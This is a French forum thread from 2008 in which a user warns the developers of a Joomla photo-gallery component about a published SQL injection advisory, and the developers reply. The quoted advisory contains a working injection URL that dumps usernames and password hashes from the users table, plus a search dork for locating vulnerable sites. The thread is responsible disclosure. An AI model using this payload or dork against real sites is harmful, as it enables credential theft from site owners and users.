Forums

NeoJoomla - Français => Suggestions et retours => Topic started by: Stéphane Bourderiou on February 08, 2008, 11:11:24 PM


Title: Failles dans Neogallery
Post by: Stéphane Bourderiou on February 08, 2008, 11:11:24 PM
Bonsoir,

je vous préviens d'une faille détectée sur votre composant.

Cordialement

Citation
#########################################################################
#
#  joomla SQL Injection(com_neogallery)
#
#########################################################################
#
#  AUTHOR : S@BUN
#
#  HOME : http://www.milw0rm.com/author/1334
#
#  MAİL :    www.milw0rm.com@gmail.com
#
#########################################################################
#
# DORK 1 : allinurl:"com_neogallery"
#
##########################################################################
EXPLOIT :

index.php?option=com_neogallery&task=show&Itemid=5&catid=999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),concat(username,0x3a,password),concat(username,0x3a,password)/**/from%2F%2A%2A%2Fjos_users

#########################################################################
# S@BUN                    i AM NOT HACKER                         S@BUN
#########################################################################
# S@BUN                  http://www.milw0rm.com                    S@BUN
#########################################################################
#                           THANKS STROKE
#########################################################################

   <name>NeoGallery</name>
   <creationDate>Septembre 2006</creationDate>
   <author>Nicolas Cornet - Neoweb</author>
   <copyright>This component is released under the GNU/GPL License</copyright>
   <authorEmail>nicolas@neoweb.fr</authorEmail>

   <authorUrl>www.neoweb.fr</authorUrl>
   <version>1.1</version>
   <description><![CDATA[Ce composant vous permet d'afficher une galerie de photos, organisees en categories, sur votre site.<br />Realise par Nicolas Cornet - Neoweb.]]></description>

# milw0rm.com [2008-02-08]


Title: Re : Failles dans Neogallery
Post by: Raphael on February 11, 2008, 09:04:53 AM
Merci pour ce retour Stéphane,

Nous allons nous occuper de cela au plus vite!

Cordialement,

Title: Re : Failles dans Neogallery
Post by: Nicolas on February 11, 2008, 09:08:30 AM
Bonjour Stéphane,

Sur quel site avez-vous trouvé cette faille ? Ce composant n'est installé que sur 1 ou 2 de nos sites et n'est pas disponible sur NeoJoomla.

Cordialement,

Title: Re : Failles dans Neogallery
Post by: Stéphane Bourderiou on February 11, 2008, 12:04:37 PM
Bonjour Nicolas,

sur ce site http://www.milw0rm.com (http://www.milw0rm.com), ce qui m'a étonné dans un premier c'est le nom du composant vu que je connais bien vos produits, puis les informations fournit sont trop précises : allinurl:"com_neogallery" (http://allinurl:"com_neogallery").

Vu que je suis toujours à l'affut d'information pour nos membres, il est logique de prévenir les éditeurs en cas de découverte.

Cordialement

Stéphane


Powered by SMF 1.1 RC3 | SMF © 2001-2006, Lewis Media
Joomla Bridge by JoomlaHacks.com